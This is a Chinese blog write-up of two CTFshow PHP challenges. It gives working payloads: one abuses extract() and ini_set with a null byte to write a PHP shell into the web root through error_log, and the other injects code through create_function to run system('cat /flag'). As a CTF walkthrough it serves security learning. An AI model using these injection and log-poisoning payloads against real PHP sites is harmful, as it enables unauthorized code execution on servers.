CTFshow 限时活动 红包挑战7、红包挑战8

Jay 172023-08-16 20:27

CTFshow红包挑战7

写不出来一点,还是等了官方wp之后才复现。

直接给了源码

php 复制代码 
<?php
highlight_file(__FILE__);
error_reporting(2);

extract($_GET);
ini_set($name,$value);

system(
    "ls '".filter($_GET[1])."'"
);

function filter($cmd){
    $cmd = str_replace("'","",$cmd);
    $cmd = str_replace("\\","",$cmd);
    $cmd = str_replace("`","",$cmd);
    $cmd = str_replace("$","",$cmd);
    return $cmd;
}

extract:从数组中将变量导入到当前的符号表

ini_set:为一个配置选项设置值(我们可以修改配置项)

报错等级是2。他限定只能使用ls 什么什么,而且filter自定义函数过滤了'\ 、`` $这四个字符。不好使用闭合来绕过对getshell`的限制。

既然ls 什么什么里面的什么什么可以控制,那就先遍历目录来看看吧。

复制代码 
?1=/usr/local/lib/php/extensions/no-debug-non-zts-20180731/

当前环境存在5个扩展,包含xdebug。分别是mysqli.so opcache.so pdo_mysql.so sodium.so xdebug.so

PHP版本是7.3.22

输入?1=/,服务端内部语句拼接为ls '/'。返回了根目录下所有文件。

flag应该就在flag文件中

开始思索题目。感觉关键代码是这三句:

php 复制代码 
//不同寻常的报错等级
error_reporting(2);

//修改$name,$value
extract($_GET);

//开启某个配置项
ini_set($name,$value);

程序执行期间的ini_set不能disable_functions ,无法直接禁用str_replace函数

知识点:

xdebug在处理截断问题的时候,会将异常payload回显。而system刚好可以用0字节(%00或者\000)进行截断来触发异常。

思路:

通过触发异常后,将回显的内容(可控)写入到web目录(修改配置项,把报错写入自定义报错日志)。即可实现写马到文件。

php 复制代码 
ini_set("display_errors", "On");//打开错误提示,与题目无关,只是扩展
ini_set("error_reporting",E_ALL);//显示所有错误,与题目无关,只是扩展

ini_set("error_log",""/var/www/html/1.php");
//把报错信息写入web目录下的1.php文件中

尝试看看报错,%00确实能截断导致报错。

payload:

php 复制代码 
?name=error_log&value=/var/www/html/1.php&1=%00<?php system("cat /f*");?>

可以发现,报错已经写入自定义的报错日志,同时,报错代码被自动执行了。

此外,官方wp还给了一种造成报错的方法:

php 复制代码 
/?name=error_log&value=1.php
&1=("%0C%08%00%00"^"`{ %2f")<?php system("cat /*");?>
复制代码 
("%0C%08%00%00"^"`{ %2f")

即

EKc ^

URL编码后

EKc%20%02^

但是直接

复制代码 
?name=error_log&value=1.php
&1=EKc%20%02^<?php system("cat /*");?>

是无法造成报错的,这种造成报错方式有待细细研究。

CTFshow红包挑战8

考点:PHP create_function

扩展练习(相关题目):NSS [NISACTF 2022]level-up

源码直接给了。

php 复制代码 
<?php

highlight_file(__FILE__);
error_reporting(0);

extract($_GET);
create_function($name,base64_encode($value))();
?>

create_function($name,base64_encode($value))();相当于创建匿名函数后直接执行。就像nmhs();这样。

其中,$name是参数,base64_encode($value)是要执行的代码段,但是这里base64编码过了,执行不了。

可以看作如下代码:(片段1)【一定要当作函数片段来看,而不是一行有参数的函数调用】

php 复制代码 
nmhs($name){
	base64_encode($value)
}

那我就不要base64_encode($value),直接从$name开始构造。

先看看payload:

复制代码 
?value=Jay17&name=){}phpinfo();/*

我们把payload中$name带入片段1。

php 复制代码 
片段1:
nmhs($name){
	base64_encode($value)
}
php 复制代码 
带入$name
nmhs(){}phpinfo();/*){
	base64_encode($value)
}
php 复制代码 
整理一下
nmhs(){
    
}phpinfo();
/*){
	base64_encode($value)
}

最终payload:

复制代码 
?value=Jay17&name=){}system("cat /flag");/*
相关推荐
zimoyin1 小时前
kotlin Android AccessibilityService 无障碍入门
android·开发语言·kotlin
A5rZ8 小时前
CSRF攻击 + 观测iframe加载时间利用时间响应差异侧信道攻击 -- reelfreaks DefCamp 2024
网络安全·csrf
独行soc10 小时前
2025年渗透测试面试题总结-百度面经(题目+回答)
运维·开发语言·经验分享·学习·面试·渗透测试·php
pengone12 小时前
PHP8.0版本导出excel失败
php·excel
韩仔搭建12 小时前
第二章:安卓端启动流程详解与疑难杂症调试手册
android·ui·娱乐
A-花开堪折12 小时前
Android7 Input(七)App与input系统服务建立连接
android
冰糖葫芦三剑客12 小时前
Android 自定义悬浮拖动吸附按钮
android
可怜的Tom被玩弄于股掌之中12 小时前
BUUCTF——ReadlezPHP
安全·web安全·网络安全·网络攻击模型·安全架构
吃汉堡吃到饱12 小时前
【Android】从Choreographer到UI渲染(二)
android·ui
你好我是小美13 小时前
信息收集+初步漏洞打点
安全·web安全·网络安全
热门推荐
01从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06Coze扣子平台完整体验和实践(附国内和国际版对比)07Ubuntu24.04安装中文输入法08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09DeepSeek各版本说明与优缺点分析10华中科技大学计算机组成原理-计算机数据表示实验(全部通关)